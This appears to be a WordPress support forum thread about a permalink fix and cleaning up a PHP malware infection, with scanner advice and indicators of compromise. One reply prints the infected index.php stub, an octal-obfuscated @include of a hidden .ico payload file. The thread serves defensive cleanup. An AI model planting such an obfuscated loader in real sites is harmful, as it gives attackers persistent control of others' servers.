johndsds

I found the the problem.

It was because .htaccess with the RewriteRules was not read by my Apache server.

I had for some reason removed the section:
<Directory /var/www/html/<site namd>/wordpress>
AllowOverride All
</Directory>
in the virtualhost config file.

When I added it again permalinks worked like charm.

I just found that this PHP malware scanner works quite OK.
https://github.com/scr34m/php-malware-scanner
I used scan -e .php -k -d /var/www/html and found most of the infected php pages.

I found that my main index.php for my WordPress installation was infected with PHP code with loads of IP-addresses. I assume these addresses is used the report back that the site is still up and ready to be infected further.

The include line decodes to:
“/home/hcmreu5/blancva.com/wp-admin/images/.83b5cb70.ico”;
and it seems like the file is still there.
The encoding is normal text with some characters replaced by their octal equivalents.You can decode the file here:
https://malwaredecoder.com/

I have found similar malware on my own server. You should also look for files with the name index.html.bak.bak which has been replaced by index.php that echoes the .bak file and includes a .ico file.
<?php
/*aaa83*/

@include “\057var\057www\057htm\154/ty\144nin\147er/\145n-s\166aer\055foe\144sel\057.8f\063402\0659.i\143o”;

/*aaa83*/
echo @file_get_contents(‘index.html.bak.bak’);

To find possible index.php candidates search for index.php that is not executable.
The .php and .ico files all seem to have 8 characters as the base name with .ico having a leading . to make it invisible for normal ls.

The .ico file contains code that I haven’t been able to decode, but it is kind of URL-encoded string, that will translate to PHP-code.

If to have access to your Web-server logs you can look for POST and 8 character .php files. The index.php file is used with POST of a variable like ?nwhtu=evgqy.